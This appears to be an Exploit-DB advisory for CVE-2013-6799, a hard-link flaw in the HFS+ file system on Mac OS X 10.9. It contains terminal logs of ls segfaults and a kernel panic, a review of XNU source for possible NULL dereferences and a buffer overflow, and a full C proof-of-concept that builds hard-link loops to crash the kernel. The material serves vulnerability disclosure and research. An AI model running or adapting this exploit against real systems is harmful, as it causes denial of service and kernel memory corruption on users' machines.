Apple Mac OSX 10.9 – Hard Link Memory Corruption

  • 作者: Maksymilian Arciemowicz
    日期: 2014-04-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/32754/
  • /*
    MacOSX/XNU HFS Multiple Vulnerabilities
    Maksymilian Arciemowicz
    http://cxsecurity.com/
    http://cifrex.org/
    
    ===================
    
    On November 8th, I've reported vulnerability in hard links for HFS+
    (CVE-2013-6799)
    
    http://cxsecurity.com/issue/WLB-2013110059
    
    The HFS+ file system does not apply strict privilege rules during the
    creating of hard links. The ability to create hard links to directories is
    wrong implemented and such an issue is affecting os versions greater or
    equal to 10.5. Officially Apple allows you to create hard links only for
    your time machine. <see wiki> Vulnerability CVE-2013-6799 (incomplete fix
    for CVE-2010-0105) allow to create hard link to directory and the number of
    hard links may be freely high. To create N hard links, you must use a
    special algorithm which creates links from the top of the file system tree.
    This means that first we create the directory structure and once created we
    need to go from up to down by creating hard links. The last time I've
    mentioned of the possibility of a kernel crash by performing the 'ls'
    command. This situation occurs in conjunction with the 'find' application.
    
    Commands such as 'ls' behave in unexpected ways. Apple are going find this
    crash point in code. To create huge hard links structure, use this code
    
    http://cert.cx/stuff/l2.c
    
    -----------------------------------
    h1XSS:tysiak cx$ uname -a
    Darwin 000000000000000.home 13.1.0 Darwin Kernel Version 13.1.0: Thu Jan 16
    19:40:37 PST 2014; root:xnu-2422.90.20~2/RELEASE_X86_64 x86_64
    h1xss:tysiak cx$ gcc -o l2 l2.c
    h1xss:tysiak cx$ ./l2 1000
    ...
    h1xss:tysiak cx$ cat loop.sh
    #!/bin/bash
    while [ 1 ] ; do
    ls -laR B > /dev/null
    done
    
    h1xss:tysiak cx$ sh ./loop.sh
    ls: B: No such file or directory
    ls: X1: No such file or directory
    ...
    ls: X8: Bad address
    ls: X1: Bad address
    ls: X2: Bad address
    ...
    ls: X8: No such file or directory
    ./loop.sh: line 4:8816 Segmentation fault: 11ls -laR B > /dev/null
    ./loop.sh: line 4:8818 Segmentation fault: 11ls -laR B > /dev/null
    ls: B: No such file or directory
    ls: X1: No such file or directory
    ls: X2: No such file or directory
    ...
    ls: X1: No such file or directory
    ls: X2: No such file or directory
    -----------
    ...
    -----------
    Feb9 21:16:38 h1xss.home ReportCrash[9419]: Saved crash report for
    ls[9418] version 230 to
    /Users/freak/Library/Logs/DiagnosticReports/ls_2014-02-09-211638_h1XSS.crash
    -----------
    
    That what we can see here is unexpected behavior of LS command. LS process
    is also affected for infinite loop (recursion?).
    
    -----------
    h1xss:tysiak cx$ ps -fp 8822
    UID PIDPPID C STIME TTY TIME CMD
    50188228810 07:36 ttys002 62:19.65 ls -laR B
    -----------
    
    or used parallely with (find . > /dev/null) command cause a kernel crash
    
    -----------
    Mon Mar 31 20:30:41 2014
    panic(cpu 0 caller 0xffffff80044dbe2e): Kernel trap at 0xffffff8004768838,
    type 13=general protection, registers:
    CR0: 0x0000000080010033, CR2: 0xffffff8122877004, CR3: 0x0000000001a5408c,
    CR4: 0x00000000001606e0
    RAX: 0xffffff802bc148a0, RBX: 0xdeadbeefdeadbeef, RCX: 0x0000000000008000,
    RDX: 0x0000000000000000
    RSP: 0xffffff8140d9b990, RBP: 0xffffff8140d9b9a0, RSI: 0x0000000000000018,
    RDI: 0xffffff802f23bcd0
    R8:0xffffff8140d9bc1c, R9:0xffffff802f26e960, R10: 0xffffff8140d9ba2c,
    R11: 0x0000000000000f92
    R12: 0xffffff801ba1a008, R13: 0xffffff8140d9bb20, R14: 0xffffff802f23bcd0,
    R15: 0xffffff802f26e960
    RFL: 0x0000000000010282, RIP: 0xffffff8004768838, CS:0x0000000000000008,
    SS:0x0000000000000010
    Fault CR2: 0xffffff8122877004, Error code: 0x0000000000000000, Fault CPU:
    0x0
    
    Backtrace (CPU 0), Frame : Return Address
    0xffffff811eee8c50 : 0xffffff8004422fa9
    
    BSD process name corresponding to current thread: ls
    -----------
    
    XNU is the computer operating system kernel that Apple Inc. acquired and
    developed for use in the Mac OS X operating system and released as free and
    open source software as part of the Darwin operating system. We can try to
    see HFS implementation code. Let's start static code analysys using
    cifrex.org tool!
    
    -1.---------------------------------------------------------
    Unchecked Return Value to NULL Pointer Dereference in hfs_vfsops.c
    
    Code:
    http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vfsops.c
    
    --- hfs_vfsops.c ----------------------------
    /*
     * HFS filesystem related variables.
     
    int
    hfs_sysctl(int *name, __unused u_int namelen, user_addr_t oldp, size_t
    *oldlenp,
    user_addr_t newp, size_t newlen, vfs_context_t context)
    {
    ...
     if ((newlen <= 0) || (newlen > MAXPATHLEN))
    return (EINVAL);
    
    bufsize = MAX(newlen * 3, MAXPATHLEN);
    MALLOC(filename, char *, newlen, M_TEMP, M_WAITOK);
    if (filename == NULL) { <=====================================
    filename CHECK
    error = ENOMEM;
    goto encodinghint_exit;
    }
    MALLOC(unicode_name, u_int16_t *, bufsize, M_TEMP, M_WAITOK);
    if (filename == NULL) { <======================================
    double CHECK?
    error = ENOMEM;
    goto encodinghint_exit;
    }
    
    error = copyin(newp, (caddr_t)filename, newlen);
    if (error == 0) {
    error = utf8_decodestr((u_int8_t *)filename, newlen - 1,
    unicode_name,
     &bytes, bufsize, 0, UTF_DECOMPOSED);
    if (error == 0) {
    hint = hfs_pickencoding(unicode_name, bytes / 2);
    error = sysctl_int(oldp, oldlenp, USER_ADDR_NULL, 0,
    (int32_t *)&hint);
    }
    }
    --- hfs_vfsops.c----------------------------
    
    Twice checking of 'filename' has no sense. Probably 'unicode_name' should
    be checked in second condition.
    
    
    -2.---------------------------------------------------------
    Possible Buffer Overflow in resource fork (hfs_vnops.c)
    
    Unverified value returned by snprintf() may be bigger as a declared buffer
    (MAXPATHLEN).
    
    
    https://developer.apple.com/library/mac/documentation/Darwin/Reference/ManPages/man3/snprintf.3.html
    ---
    The snprintf() and vsnprintf() functions will write at most n-1 of the
    characters printed into the out-put output
     put string (the n'th character then gets the terminating `\0'); if the
    return value is greater than or
     equal to the n argument, the string was too short and some of the
    printed characters were discarded.
     The output is always null-terminated.
    ---
    
    
    Code:
    http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vnops.c
    
    --- hfs_vnops.c ----------------------------
    ...
    /*
     * hfs_vgetrsrc acquires a resource fork vnode corresponding to the cnode
    that is
     * found in 'vp'.The rsrc fork vnode is returned with the cnode locked
    and iocount
     * on the rsrc vnode.
     *
     ...
     
    
    int
    hfs_vgetrsrc(struct hfsmount *hfsmp, struct vnode *vp, struct vnode **rvpp,
    int can_drop_lock, int error_on_unlinked)
    {
    
    ...
    
    /*
     * Supply hfs_getnewvnode with a component name.
     
    cn.cn_pnbuf = NULL;
    if (descptr->cd_nameptr) {
    MALLOC_ZONE(cn.cn_pnbuf, caddr_t, MAXPATHLEN, M_NAMEI,
    M_WAITOK);
    cn.cn_nameiop = LOOKUP;
    cn.cn_flags = ISLASTCN | HASBUF;
    cn.cn_context = NULL;
    cn.cn_pnlen = MAXPATHLEN;
    cn.cn_nameptr = cn.cn_pnbuf;
    cn.cn_hash = 0;
    cn.cn_consume = 0;
    cn.cn_namelen = snprintf(cn.cn_nameptr, MAXPATHLEN,
    <================
     "%s%s", descptr->cd_nameptr,
     _PATH_RSRCFORKSPEC);
    }
    dvp = vnode_getparent(vp);
    error = hfs_getnewvnode(hfsmp, dvp, cn.cn_pnbuf ? &cn : NULL,
    <================
    descptr, GNV_WANTRSRC | GNV_SKIPLOCK,
    &cp->c_attr,
    &rsrcfork, &rvp, &newvnode_flags);
    
    --- hfs_vnops.c ----------------------------
    
    Pattern is '%s%s' where sum of length descptr->cd_nameptr and
    _PATH_RSRCFORKSPEC may be bigger as a declared buffer size (MAXPATHLEN).
    Size of descptr->cd_nameptr is MAXPATHLEN and value _PATH_RSRCFORKSPEC is
    
    #define _PATH_RSRCFORKSPEC "/..namedfork/rsrc"
    
    where length is 17 chars. Possible up to 17 chars overflow here?.
    
    Now let's see hfs_getnewvnode function
    
    http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_cnode.c
    
    --- hfs_cnode.c ----------------------------
    hfs_getnewvnode(
    struct hfsmount *hfsmp,
    struct vnode *dvp,
    struct componentname *cnp, <======== WATCH THIS
    struct cat_desc *descp,
    int flags,
    struct cat_attr *attrp,
    struct cat_fork *forkp,
    struct vnode **vpp,
    int *out_flags)
    {
    ...
    if ((*vpp != NULL) && (cnp)) {
    /* we could be requesting the rsrc of a hardlink
    file... 
    vnode_update_identity (*vpp, dvp, cnp->cn_nameptr,
    cnp->cn_namelen, cnp->cn_hash, <== NAMELEN HERE
    (VNODE_UPDATE_PARENT | VNODE_UPDATE_NAME));
    ...
    --- hfs_cnode.c ----------------------------
    
    and call to vnode_update_indentity()
    
    http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/vfs/vfs_cache.c
    
    
    --- vfs_cache.c ----------------------------
    void
    vnode_update_identity(vnode_t vp, vnode_t dvp, const char *name, int
    name_len, uint32_t name_hashval, int flags)
    {
    ...
    if ( (flags & VNODE_UPDATE_NAME) ) {
    if (name != vp->v_name) {
    if (name && *name) {
    if (name_len == 0)
    name_len = strlen(name);
    tname = vfs_addname(name, name_len, name_hashval, 0); <==
    NAMELEN HERE
    }
    } else
    flags &= ~VNODE_UPDATE_NAME;
    }
    ...
    const char *
    vfs_addname(const char *name, uint32_t len, u_int hashval, u_int flags)
    {
    return (add_name_internal(name, len, hashval, FALSE, flags));<== CALL
    
    }
    --- vfs_cache.c ----------------------------
    
    And invalid memory reference in add_name_internal()
    
    --- vfs_cache.c ----------------------------
    static const char *
    add_name_internal(const char *name, uint32_t len, u_int hashval, boolean_t
    need_extra_ref, __unused u_int flags)
    {
    struct stringhead *head;
    string_t*entry;
    uint32_tchain_len = 0;
    uint32_thash_index;
    uint32_tlock_index;
    char*ptr;
    
    /*
     * if the length already accounts for the null-byte, then
     * subtract one so later on we don't index past the end
     * of the string.
     
    if (len > 0 && name[len-1] == '\0') { <===== INVALID MEMORY REFERENCE
    len--;
    }
    if (hashval == 0) {
    hashval = hash_string(name, len);
    }
    --- vfs_cache.c ----------------------------
    
    
    -3.---------------------------------------------------------
    Unchecked Return Value to NULL Pointer Dereference hfs_catalog.c and not
    only
    
    Please pay attention that a buffer length check (stored in some variable)
    should be performed; also return from *alloc() function family should be
    verified for possible NULL pointers.
    Here are a few FALSE / POSITIVE examples.
    
    http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_catalog.c
    
    --- hfs_catalog.c ----------------------------
     /*
     * builddesc - build a cnode descriptor from an HFS+ key
     
    static int
    builddesc(const HFSPlusCatalogKey *key, cnid_t cnid, u_int32_t hint,
    u_int32_t encoding,
    int isdir, struct cat_desc *descp)
    {
    int result = 0;
    unsigned char * nameptr;
    size_t bufsize;
    size_t utf8len;
    unsigned char tmpbuff[128];
    
    /* guess a size... 
    bufsize = (3 * key->nodeName.length) + 1;
    if (bufsize >= sizeof(tmpbuff) - 1) { <============================
    MALLOC(nameptr, unsigned char *, bufsize, M_TEMP, M_WAITOK); <=
    MALLOC FAIL
    } else {
    nameptr = &tmpbuff[0];
    }
    
    result = utf8_encodestr(key->nodeName.unicode,
    key->nodeName.length * sizeof(UniChar),
    nameptr, (size_t *)&utf8len, <============================
    
    ...
    maxlinks = MIN(entrycnt, (u_int32_t)(uio_resid(uio) /
    SMALL_DIRENTRY_SIZE));
    bufsize = MAXPATHLEN + (maxlinks * sizeof(linkinfo_t)) + sizeof(*iterator);
    if (extended) {
    bufsize += 2*sizeof(struct direntry);
    }
    MALLOC(buffer, void *, bufsize, M_TEMP, M_WAITOK);
    <============================
    bzero(buffer, bufsize);
    ...
    FREE(nameptr, M_TEMP);
    MALLOC(nameptr, unsigned char *, bufsize, M_TEMP, M_WAITOK); <==============
    
    result = utf8_encodestr(key->nodeName.unicode,
    key->nodeName.length * sizeof(UniChar),
    nameptr, (size_t *)&utf8len,
    bufsize, ':', 0);
    }
     ...
    cnp = (const CatalogName *)&ckp->hfsPlus.nodeName;
    bufsize = 1 + utf8_encodelen(cnp->ustr.unicode,
     cnp->ustr.length * sizeof(UniChar),
     ':', 0);
    MALLOC(new_nameptr, u_int8_t *, bufsize, M_TEMP, M_WAITOK); <========
    result = utf8_encodestr(cnp->ustr.unicode,
    cnp->ustr.length * sizeof(UniChar),
    new_nameptr, &tmp_namelen, bufsize, ':', 0);
    
    --- hfs_catalog.c ----------------------------
    
    The above examples does not look nice, too. Are you among them is the crux
    of the problem applications and kernel crash?
    I informed Apple of those possible errors, it has passed more than a month
    and I still have not received any comment nor solution.
    
    
    --- 1. References ---
    http://cxsecurity.com/issue/WLB-2014040027
    http://cxsecurity.com/cveshow/CVE-2013-6799/
    http://cxsecurity.com/cveshow/CVE-2010-0105/
    
    
    --- 2. Greetz ---
    Kacper George and Michal
    
    
    --- 3. Credit ---
    Maksymilian Arciemowicz
    http://cxsecurity.com/
    http://cifrex.org/
    http://cert.cx/
    
    Best regards,
    CXSEC TEAM
    http://cxsec.org/
    
    */
    
    #include <stdio.h>
    #include <unistd.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/param.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <err.h>
    #include <errno.h>
    #include <locale.h>
    
    /*
    
    MacOS X 10.9 Hard Link Memory Corruption PoC
    Maksymilian Arciemowicz 
    http://cxsecurity.com/
    http://cert.cx/
    
    */
    int mkpath(char *path, mode_t mode, mode_t dir_mode){
    
    struct stat sb;
    char *slash;
    int done,rv;
    
    done=0;
    slash=path;
    
    for(;;){
    slash += strspn(slash,"/");
    slash += strcspn(slash,"/");
    
    done = (*slash=='\0');
    *slash = '\0';	
    
    rv = mkdir(path, done ? mode : dir_mode);
    if(rv < 0){
    int sverrno;
    
    sverrno = errno;
    
    if(stat(path,&sb)<0){
    errno=sverrno;
    warn("%s",path);
    return -1;
    }
    
    if(!S_ISDIR(sb.st_mode)){
    errno = ENOTDIR;
    warn("%s",path);
    return -1;
    }
    } else if (done){
    if((chmod(path,mode)== -1)) {
    warn("%s",path);
    return -1;
    }
    }
    
    if(done){
    break;
    }
    
    *slash = '/';
    }
    
    return 0;
    }
    
    int main(int argc, char *argv[]){
    
    if(argc!=2){
    printf("Use it with (int)arg[1]\n");
    return 1;
    }
    
    int wbita=atoi(argv[1]);
    
    char symn1[]="X1\0";
    char symn2[]="X2\0";
    char symn3[]="X3\0";
    char symn4[]="X4\0";
    char symn5[]="X5\0";
    char symn6[]="X6\0";
    char symn7[]="X7\0";
    char symn8[]="X8\0";
    char buff[]="B\0";
    char cd[]="..\0";
    char *sym;
    
    FILE *fp;
    
    int level=0;
    mode_t mode,dir_mode;
    
    sym=malloc(((strlen(buff)*2)+2)*sizeof(char));
    
    mode = ((S_IRWXU | S_IRWXG | S_IRWXO) & ~umask(0));
    dir_mode = mode | S_IWUSR |S_IXUSR;
    
    mkpath(buff,mode,dir_mode);
    
    while(1) // Phase 0
    if(0!=chdir(buff)){
    printf("Phase 0 done\n");
    break;
    }
    else printf("Next %i\n",level++);
    
    strcpy(sym,buff);
    strcat(sym,"/");
    strcat(sym,buff);
    
    for(int ax=level; ax<wbita; ax++){
    mkpath(buff,mode,dir_mode);
    
    printf("Directory created Level: %i\n",ax);
    
    if(0!=chdir(buff)){
    printf("Error. chdir() failed.");
    break;
    }
    }
    
    mkpath(buff,mode,dir_mode);
    chdir(buff);
    mkpath(buff,mode,dir_mode);
    chdir(cd);
    
    //Let's create hardlinks and cd .. loop
    
    for(int ax=level; ax<wbita; ax++){
    
    printf("Link1(%s,%s)=%i; cd ..\n",sym,symn1,link(sym,symn1));
    printf("Link2(%s,%s)=%i; cd ..\n",sym,symn2,link(sym,symn2));
    printf("Link3(%s,%s)=%i; cd ..\n",sym,symn3,link(sym,symn3));
    printf("Link4(%s,%s)=%i; cd ..\n",sym,symn4,link(sym,symn4));
    printf("Link5(%s,%s)=%i; cd ..\n",sym,symn5,link(sym,symn5));
    printf("Link6(%s,%s)=%i; cd ..\n",sym,symn6,link(sym,symn6));
    printf("Link7(%s,%s)=%i; cd ..\n",sym,symn7,link(sym,symn7));
    printf("Link8(%s,%s)=%i; cd ..\n",sym,symn8,link(sym,symn8));
    
    if(0!=chdir(cd)){
    printf("Error. chdir failed!");
    break;
    }
    }
    return 0;
    }